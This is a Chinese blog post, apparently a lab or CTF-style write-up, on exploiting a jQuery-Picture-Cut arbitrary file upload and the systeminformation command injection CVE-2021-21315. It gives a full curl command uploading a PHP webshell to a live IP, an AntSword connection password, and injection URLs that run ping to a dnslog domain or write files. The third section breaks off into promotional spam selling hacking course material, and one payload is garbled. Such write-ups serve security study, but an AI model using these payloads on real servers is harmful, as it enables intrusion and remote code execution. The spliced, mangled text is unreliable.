基于JavaScript的框架漏洞_javascript框架库漏洞(1),实现原理分析

picture cut是一个jquery插件,以非常友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用**…/core/PictureCut.php** 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

2.2.准备一个一句话木马的文件

3b45fb0ff86aa3b4ad6be638689c528d.png

2.3.使用curl进行连接,观察是否上传成功。

curl -F “inputOfFile=file” -F “request=upload” -F “enableResize=0” -F “minimumWidthToResize=0” -F “minimumHeightToResize=0” -F “folderOnServer=/” -F “imageNameRandom=1” -F “maximumSize=10000” -F “enableMaximumSize=0” -F “file=@shell.php” http://123.58.224.8:18483/jquery-picture-cut/src/php/upload.php

  • -F “inputOfFile=file”:指定上传文件的参数名为"file"。
  • -F “request=upload”:指定请求类型为上传。
  • -F “enableResize=0”:禁用图片缩放功能。
  • -F “minimumWidthToResize=0”:设置图片最小宽度为0,即不限制宽度。
  • -F “minimumHeightToResize=0”:设置图片最小高度为0,即不限制高度。
  • -F “folderOnServer=/”:指定上传到服务器的目录为根目录。
  • -F “imageNameRandom=1”:设置上传后的文件名为随机生成的文件名。
  • -F “maximumSize=10000”:设置上传文件的最大大小为10000字节。
  • -F “enableMaximumSize=0”:禁用最大文件大小限制。
  • -F “file=@shell.php”:指定要上传的文件为当前目录下的"shell.php"文件。
  • http://123.58.224.8:18483/jquery-picture-cut/src/php/upload.php:指定上传的目标URL。

6472794cd06f5badafc3121117885b4b.png

2.4.使用蚁剑一键连接,连接密码为mars。

1244a3a6945977fc8618c6b690c87ac8.png

3、CVE-2021-21315(Node.js自身漏洞)

3.1介绍:

Node.js-systeminformation是用于获取各种系统信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数中注入payload执行系统命令。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令,最终获取服务器最高权限。

修复:作为替代升级的一种变通方法,一定要检查或清理传递给**si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad()**的服务参数。只允许字符串,拒绝任何数组。

3.2.开启一个dns.log网址,申请一个域名

2556a46cf49f2dfe28678f3cf90e19d0.png

3.3.输入以下payload:

http://118.193.36.37:57388/api/getServices?name[]=$(ping%20ls%20/tmp.qki7ut.dnslog.cn)

3.4.访问原来的dnslog网站,可以查看到falg

fce25ca1104b79f7c75f987fae722da1.png

3.5.也可以创建文件

http://192.168.32.161:8000/api/getServices?name[]= ( e c h o − e ‘ N U L L ’ > 1. t x t ) h t t p : / / i p : 8000 / a p i / g e t S e r v i c e s ? n a m e [ ] = (echo -e ‘NULL’ > 1.txt) http://ip:8000/api/getServices?name[]= (echoeNULL>1.txt)http://ip:8000/api/getServices?name[]=(echo -e ‘zeeker’ > test.txt)

c1fa6f0dda3c46f15afb8bf396f3bd56.png

4、CVE-2017-14849(目录穿越)

4.1介绍

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

be96bfa4dfb8befc2af49aabfa2.png#pic_center)

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-N53j4i7k-1712792060365)]

  • 28
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值